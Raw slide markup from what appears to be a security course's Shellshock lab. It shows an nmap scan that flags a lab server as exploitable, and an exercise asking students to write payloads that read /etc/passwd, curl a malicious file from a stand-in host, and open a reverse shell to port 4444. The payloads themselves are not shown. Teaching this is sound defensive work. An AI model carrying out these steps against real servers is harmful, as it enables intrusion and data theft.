                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> NSE.</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Send injection payloads to a vulnerable server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>using Burp Repeater.</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2041" name="Google Shape;2041;p104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430175" y="1360450"/>
            <a:ext cx="355500" cy="355500"/>
          </a:xfrm>
          <a:prstGeom prst="bevel">
            <a:avLst>
              <a:gd name="adj" fmla="val 125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104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430175" y="1920240"/>
            <a:ext cx="355500" cy="355500"/>
          </a:xfrm>
          <a:prstGeom prst="bevel">
            <a:avLst>
              <a:gd name="adj" fmla="val 125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104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430175" y="2450592"/>
            <a:ext cx="355500" cy="355500"/>
          </a:xfrm>
          <a:prstGeom prst="bevel">
            <a:avLst>
              <a:gd name="adj" fmla="val 125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217"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2218" name="Google Shape;2218;p122"/>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Researching Shellshock Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2219" name="Google Shape;2219;p122"/>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Find a tool that determines if a server is vulnerable to Shellshock. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2220" name="Google Shape;2220;p12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20</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2221" name="Google Shape;2221;p122"/>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225"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2226" name="Google Shape;2226;p123"/>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Researching Shellshock Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2227" name="Google Shape;2227;p123"/>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Find a tool that determines if a server is vulnerable to Shellshock. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2228" name="Google Shape;2228;p12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21</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2229" name="Google Shape;2229;p123"/>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230" name="Google Shape;2230;p123"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1183050"/>
            <a:ext cx="9144000" cy="3723300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>http-shellshock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. Example usage below: </a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>$ nmap -sV -p- --script http-shellshock 172.16.0.2</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>  PORT   STATE SERVICE REASON</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>  80/tcp open  http    syn-ack</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>  http-shellshock:</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    VULNERABLE:</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    HTTP Shellshock vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>      State: VULNERABLE (Exploitable)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>      IDs:  CVE:CVE-2014-6271</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>        This web application might be affected by the vulnerability known as Shellshock. It seems the server is executing commands injected via malicious HTTP headers.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    |Disclosure date: 2014-09-24</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    |References:</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>     http://www.openwall.com/lists/oss-security/2014/09/24/10</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>     http://seclists.org/oss-sec/2014/q3/685</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" marR="152400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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234"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2235" name="Google Shape;2235;p124"/>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Researching Shellshock Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2236" name="Google Shape;2236;p124"/>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Write Shellshock payloads that: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2237" name="Google Shape;2237;p12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22</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2238" name="Google Shape;2238;p124"/>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239" name="Google Shape;2239;p124"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1183050"/>
            <a:ext cx="9144000" cy="3723300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Read /etc/passwd:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use curl to download a malicious file from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://evil.suite/mal.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open an Ncat connection to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Send a reverse shell to your port 4444:</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243"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2244" name="Google Shape;2244;p125"/>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Researching Shellshock Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2245" name="Google Shape;2245;p125"/>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Write Shellshock payloads that: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2246" name="Google Shape;2246;p12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23</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2247" name="Google Shape;2247;p125"/>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248" name="Google Shape;2248;p125"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1183050"/>
            <a:ext cx="9144000" cy="3723300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Read /etc/passwd:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
